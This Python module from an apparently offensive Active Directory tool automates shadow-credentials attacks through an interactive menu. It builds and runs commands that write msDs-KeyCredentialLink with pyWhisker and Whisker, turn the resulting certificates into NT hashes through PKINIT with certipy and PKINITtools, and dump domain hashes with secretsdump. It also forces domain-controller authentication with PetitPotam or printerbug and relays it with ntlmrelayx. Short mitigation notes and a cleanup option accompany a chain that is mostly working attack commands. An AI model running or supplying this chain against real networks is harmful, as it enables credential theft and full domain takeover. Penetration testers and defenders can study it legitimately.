"""
Module: Shadow Credentials
Techniques: msDs-KeyCredentialLink abuse (pyWhisker/Whisker),
            PKINIT → NT hash (certipy/PKINITtools),
            relay to shadow credentials (ntlmrelayx),
            auto-detect writable targets via BloodHound/LDAP
"""
from utils.helpers import *
from config.settings import SESSION

def run():
    print_banner("SHADOW CREDENTIALS", "msDs-KeyCredentialLink abuse → PKINIT → NT hash")
    dc   = input_or_session("dc_ip",    "DC IP")
    dom  = input_or_session("domain",   "Domain")
    user = input_or_session("username", "Username")
    pw   = input_or_session("password", "Password")

    print(f"""
  {C}── ENUMERATION ──────────────────────────────────────────────────{RST}
  [1]  Find writable msDs-KeyCredentialLink targets (LDAP)
  [2]  List existing Key Credentials on target
  {C}── EXPLOITATION ─────────────────────────────────────────────────{RST}
  [3]  Add Shadow Credential (pyWhisker — Linux)
  [4]  Add Shadow Credential (Whisker — Windows)
  [5]  PKINIT → NT hash (certipy)
  [6]  PKINIT → NT hash (PKINITtools gettgtpkinit)
  {C}── RELAY ATTACK ──────────────────────────────────────────────────{RST}
  [7]  Relay to Shadow Credentials (ntlmrelayx)
  {C}── CLEANUP ───────────────────────────────────────────────────────{RST}
  [8]  Remove Shadow Credential (pyWhisker)
  [0]  Back
""")
    c = input(f"  {M}Choice:{RST} ").strip()

    if c == "1":
        print(f"""
  {C}Find accounts where you can write msDs-KeyCredentialLink:{RST}

  {Y}LDAP — find GenericWrite / GenericAll targets:{RST}
  ldapsearch -x -H ldap://{dc} -D '{user}@{dom}' -w '{pw}' \\
    -b 'DC={dom.replace(".", ",DC=")}' \\
    '(objectClass=user)' sAMAccountName msds-keycredentiallink

  {Y}BloodHound Cypher (run in Neo4j):{RST}
  MATCH p=(u:User)-[:GenericWrite|GenericAll|AllExtendedRights|Owns]->(t:User)
  WHERE u.name = '{user.upper()}@{dom.upper()}'
  RETURN p

  MATCH p=(u:User)-[:GenericWrite|GenericAll]->(t:Computer)
  WHERE u.name = '{user.upper()}@{dom.upper()}'
  RETURN p

  {Y}PowerView (Windows):{RST}
  Get-DomainUser | Get-DomainObjectAcl -ResolveGUIDs | \\
    Where-Object {{$_.ActiveDirectoryRights -match "GenericWrite" -and \\
      $_.SecurityIdentifier -match \\
        (Get-DomainUser '{user}').objectsid}}
""")
        run_cmd(
            f"ldapsearch -x -H ldap://{dc} -D '{user}@{dom}' -w '{pw}' "
            f"-b 'DC={dom.replace('.', ',DC=')}' '(objectClass=user)' "
            f"sAMAccountName msds-keycredentiallink"
        )

    elif c == "2":
        target = prompt("Target account to check")
        print(f"""
  {C}List existing Key Credentials on {target}:{RST}

  {Y}pyWhisker (list):{RST}
  python3 pywhisker.py -d {dom} -u '{user}' -p '{pw}' \\
    --target '{target}' --action list --dc-ip {dc}

  {Y}ldapsearch:{RST}
  ldapsearch -x -H ldap://{dc} -D '{user}@{dom}' -w '{pw}' \\
    -b 'DC={dom.replace(".", ",DC=")}' \\
    '(sAMAccountName={target})' msds-keycredentiallink
""")
        run_cmd(
            f"python3 pywhisker.py -d {dom} -u '{user}' -p '{pw}' "
            f"--target '{target}' --action list --dc-ip {dc}"
        )

    elif c == "3":
        target  = prompt("Target account (must have GenericWrite)")
        pfx_out = prompt(f"PFX output name (default={target}_shadow)") or f"{target}_shadow"
        print(f"""
  {C}Add Shadow Credential via pyWhisker:{RST}

  {Y}Add key + get PFX:{RST}
  python3 pywhisker.py \\
    -d {dom} -u '{user}' -p '{pw}' \\
    --target '{target}' \\
    --action add \\
    --filename {pfx_out} \\
    --dc-ip {dc}

  {Y}Output:{RST}
  [+] KeyCredential generated: DeviceID=<guid>
  [+] Saving PFX to {pfx_out}.pfx (password: <auto-generated>)
  [+] msDs-KeyCredentialLink updated on target!

  {Y}Next: use PFX to get NT hash (option [5]):{RST}
  certipy auth -pfx {pfx_out}.pfx -username '{target}' \\
    -domain {dom} -dc-ip {dc}
""")
        run_cmd(
            f"python3 pywhisker.py -d {dom} -u '{user}' -p '{pw}' "
            f"--target '{target}' --action add --filename {pfx_out} --dc-ip {dc}"
        )
        add_finding("Shadow Credentials Added", "Critical",
                    f"msDs-KeyCredentialLink modified on '{target}' — PKINIT auth now possible",
                    "Monitor msDs-KeyCredentialLink attribute changes (Event ID 5136); restrict GenericWrite ACLs")

    elif c == "4":
        target  = prompt("Target account")
        pfx_out = prompt(f"PFX output name (default={target}_shadow)") or f"{target}_shadow"
        print(f"""
  {C}Add Shadow Credential via Whisker (Windows):{RST}

  {Y}Add:{RST}
  .\\Whisker.exe add /target:{target} /domain:{dom} /dc:{dc} /path:{pfx_out}.pfx

  {Y}List:{RST}
  .\\Whisker.exe list /target:{target} /domain:{dom} /dc:{dc}

  {Y}Whisker outputs the Rubeus command automatically:{RST}
  .\\Rubeus.exe asktgt /user:{target} /certificate:{pfx_out}.pfx \\
    /password:<pfx_password> /domain:{dom} /dc:{dc} /getcredentials /show /nowrap

  {Y}Get NT hash from TGT (Rubeus /getcredentials):{RST}
  .\\Rubeus.exe asktgt /user:{target} /certificate:{pfx_out}.pfx \\
    /password:<pfx_password> /domain:{dom} /dc:{dc} /getcredentials /nowrap
  # Output contains NT hash directly
""")

    elif c == "5":
        target  = prompt("Target account name")
        pfx_path= prompt(f"PFX file path (e.g. /tmp/{target}_shadow.pfx)")
        print(f"""
  {C}PKINIT → NT hash via certipy:{RST}

  {Y}Authenticate with PFX — get TGT + NT hash:{RST}
  certipy auth \\
    -pfx '{pfx_path}' \\
    -username '{target}' \\
    -domain {dom} \\
    -dc-ip {dc}

  {Y}Output:{RST}
  [+] Got TGT: {target}.ccache
  [+] NT hash: <32-char-hash>

  {Y}Use NT hash for Pass-the-Hash:{RST}
  export KRB5CCNAME={target}.ccache
  impacket-psexec {dom}/{target}@{dc} -k -no-pass
  impacket-secretsdump {dom}/{target}@{dc} -k -no-pass -just-dc-ntlm
""")
        run_cmd(
            f"certipy auth -pfx '{pfx_path}' -username '{target}' "
            f"-domain {dom} -dc-ip {dc}"
        )
        add_finding("Shadow Credentials → NT Hash", "Critical",
                    f"NT hash obtained for '{target}' via PKINIT shadow credentials",
                    "Enable Credential Guard; monitor PKINIT authentication events; audit msDs-KeyCredentialLink")

    elif c == "6":
        target  = prompt("Target account")
        pfx_path= prompt("PFX file path")
        pfx_pass= prompt("PFX password")
        print(f"""
  {C}PKINIT → NT hash via PKINITtools:{RST}

  {Y}Step 1 — Get TGT with PKINIT:{RST}
  python3 gettgtpkinit.py \\
    -cert-pfx '{pfx_path}' \\
    -pfx-pass '{pfx_pass}' \\
    {dom}/{target} /tmp/{target}_pkinit.ccache

  {Y}Step 2 — Get NT hash via U2U:{RST}
  export KRB5CCNAME=/tmp/{target}_pkinit.ccache
  python3 getnthash.py \\
    -key <AS-REP-enc-key-from-step1> \\
    {dom}/{target}

  {Y}Step 3 — Use NT hash:{RST}
  impacket-secretsdump {dom}/{target}@{dc} -hashes :<nt_hash> -just-dc-ntlm
""")

    elif c == "7":
        attacker = input_or_session("attacker_ip", "Attacker IP")
        target   = prompt("Target account to add shadow creds to")
        print(f"""
  {C}Relay to Shadow Credentials:{RST}

  {Y}Terminal 1 — ntlmrelayx with --shadow-credentials:{RST}
  impacket-ntlmrelayx \\
    -t ldap://{dc} \\
    -smb2support \\
    --shadow-credentials \\
    --shadow-target '{target}'

  {Y}Terminal 2 — Trigger coercion:{RST}
  python3 PetitPotam.py {attacker} {dc}
  # or
  python3 printerbug.py '{dom}/{user}:{pw}@{dc}' {attacker}

  {Y}ntlmrelayx output:{RST}
  [+] Shadow credentials added to: {target}
  [+] Saved PFX: /tmp/{target}_shadow_*.pfx
  [+] Run: certipy auth -pfx ...

  {Y}Then authenticate:{RST}
  certipy auth -pfx /tmp/{target}_shadow_*.pfx \\
    -username '{target}' -domain {dom} -dc-ip {dc}
""")
        add_finding("Shadow Credentials via Relay", "Critical",
                    f"Relayed auth added shadow credentials to '{target}'",
                    "Enable EPA + LDAP signing; patch all coercion vectors")

    elif c == "8":
        target  = prompt("Target account")
        dev_id  = prompt("DeviceID to remove (from list command)")
        print(f"""
  {C}Remove Shadow Credential (cleanup):{RST}

  python3 pywhisker.py \\
    -d {dom} -u '{user}' -p '{pw}' \\
    --target '{target}' \\
    --action remove \\
    --device-id '{dev_id}' \\
    --dc-ip {dc}

  {Y}Clear ALL shadow credentials:{RST}
  python3 pywhisker.py \\
    -d {dom} -u '{user}' -p '{pw}' \\
    --target '{target}' \\
    --action clear \\
    --dc-ip {dc}
""")
        run_cmd(
            f"python3 pywhisker.py -d {dom} -u '{user}' -p '{pw}' "
            f"--target '{target}' --action remove --device-id '{dev_id}' --dc-ip {dc}"
        )

    pause()
